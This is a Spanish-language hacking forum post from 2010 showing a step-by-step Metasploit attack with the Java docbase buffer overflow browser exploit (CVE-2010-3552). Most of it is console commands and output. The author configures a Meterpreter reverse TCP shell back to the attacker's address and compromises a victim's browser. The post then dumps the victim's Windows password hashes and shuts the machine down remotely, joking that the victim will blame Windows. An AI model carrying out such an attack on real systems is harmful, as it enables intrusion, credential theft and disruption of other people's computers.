Explotando 0day en Java con metasploit
Publicado: 27 Oct 2010, 18:14
Bueno gente me sigo entreteniendo con metasploit y esta vez les traigo el útlimo de java que sacaron estos muchachos llamado "java_docbase_bof", el autor es RuS0pr0, me puse a buscar algo de info, aparte de la de los enlaces de metasploit pero toy medio vago así que no busqué mucho, lo único que encontre rápido era un enlace de packet-storm, en el cúal este aparecía el nombre en el primer lugar de los 10 últimos subidos, pero cuando lo fui a ver decía file missing,bajon pero bue lo tenemos en metasploit,je, ok a las armas:
Abrimos metasploit, cargamos el exploit y vemos que nos tira el comando "info"
Ok configuramos todo y chekeamos que este bien:
Abrimos, ponemos la dirección y la magia comienza:
msf exploit(java_docbase_bof) > [*] Sending exploit HTML to 192.168.1.100:1096
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1097) at Tue Oct 26 09:25:14 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1097) processing AutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
Migra la sesión de meterpreter y el navegador crashea, algo bueno es que comparado al anterior que postee el exploit se carga bastante rápido y practicamente al toque tenemos shell, disminuyendo la posibilidad de que la víctima nos cierre el navegador antes de que meterpreter migre.
Interactuamos con la sesión, dumpeamos los hash para tener con que entretenernos despues y le apagamos la compu al remoto le hecha la culpa al windows que se le apaga:
-----
¡¡Vamos arriba, INDETECTABLES!!
Abrimos metasploit, cargamos el exploit y vemos que nos tira el comando "info"
Código: Seleccionar todo
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 616 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r10827 updated today (2010.10.26)
msf > use windows/browser/java_docbase_bof
msf exploit(java_docbase_bof) > info
Name: Sun Java Runtime New Plugin docbase Buffer Overflow
Version: 10820
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
jduck <[email protected]>
Available targets:
Id Name
-- ----
0 Windows Universal (msvcr71.dll ROP)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1024
Avoid: 34 characters
Description:
This module exploits a flaw in the new plugin component of the Sun
Java Runtime Environment before v6 Update 22. By specifying specific
parameters to the new plugin, an attacker can cause a stack-based
buffer overflow and execute arbitrary code. When the new plugin is
invoked with a "launchjnlp" parameter, it will copy the contents of
the "docbase" parameter to a stack-buffer using the "sprintf"
function. A string of 396 bytes is enough to overflow the 256 byte
stack buffer and overwrite some local variables as well as the saved
return address. NOTE: The string being copied is first passed
through the "WideCharToMultiByte". Due to this, only characters
which have a valid localized multibyte representation are allowed.
Invalid characters will be replaced with question marks ('?'). This
vulnerability was originally discovered independently by both
Stephen Fewer and Berend Jan Wever (SkyLined). Although exhaustive
testing hasn't been done, all versions since version 6 Update 10 are
believed to be affected by this vulnerability. This vulnerability
was patched as part of the October 2010 Oracle Patch release.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3552
http://www.securityfocus.com/bid/44023
http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html
http://www.zerodayinitiative.com/advisories/ZDI-10-206/
http://code.google.com/p/skylined/issues/detail?id=23
http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
Ok ya sabemos los parámetros a configurar, veamos loa payloads disponibles
msf exploit(java_docbase_bof) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)Ok configuramos todo y chekeamos que este bien:
Código: Seleccionar todo
msf exploit(java_docbase_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_docbase_bof) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(java_docbase_bof) > set URIPATH /
URIPATH => /
msf exploit(java_docbase_bof) > set SRVPORT 80
SRVPORT => 80
msf exploit(java_docbase_bof) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, none, process
LHOST 192.168.1.101 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Universal (msvcr71.dll ROP)
Todo perfecto así que exploit:
msf exploit(java_docbase_bof) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.101:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.Abrimos, ponemos la dirección y la magia comienza:
msf exploit(java_docbase_bof) > [*] Sending exploit HTML to 192.168.1.100:1096
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1097) at Tue Oct 26 09:25:14 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1097) processing AutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3616)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
Migra la sesión de meterpreter y el navegador crashea, algo bueno es que comparado al anterior que postee el exploit se carga bastante rápido y practicamente al toque tenemos shell, disminuyendo la posibilidad de que la víctima nos cierre el navegador antes de que meterpreter migre.
Interactuamos con la sesión, dumpeamos los hash para tener con que entretenernos despues y le apagamos la compu al remoto le hecha la culpa al windows que se le apaga:
Código: Seleccionar todo
msf exploit(java_docbase_bof) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > hashdump
ASPNET:1008:b29ace650td0c05f0bfa5a736ecadb63:fbcd22b2d8ed614f7cb996bf996ebf73:::
FDCC User:1005:921988ba001db8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
HelpAssistant:1004:58n8fff5b883a8711ae36084c7644de3:11a7f388fda7f3416d46e6526b346bd2:::
IUSR_XP_FDCC:1007:c36c50574cd910faaa15682618b8ea0c:2424cd6387fd1934538a7b22dc6873c7:::
IWAM_XP_FDCC:1013:640b1823bca93499f622ce50e7db4fd3:8186be975dbb9ec184fffb4ae512788a:::
Renamed_Admin:500:9225986ba001dc8e1c41a0e2828864838:5f23a05483c0b292fdd922e6b05afa05:::
Renamed_Guest:501:aad3bo55b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0qE:\Java:1002:aad3b435b51404Beaad3b435b51404ee:b656a8c9fc573685ded4bb5b3a4da7dc:::
User:1003:aad3b435b51474eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shutdown
Shutting down...
Código: Seleccionar todo
meterpreter >
[*] Meterpreter session 1 closed. Reason: Died¡¡Vamos arriba, INDETECTABLES!!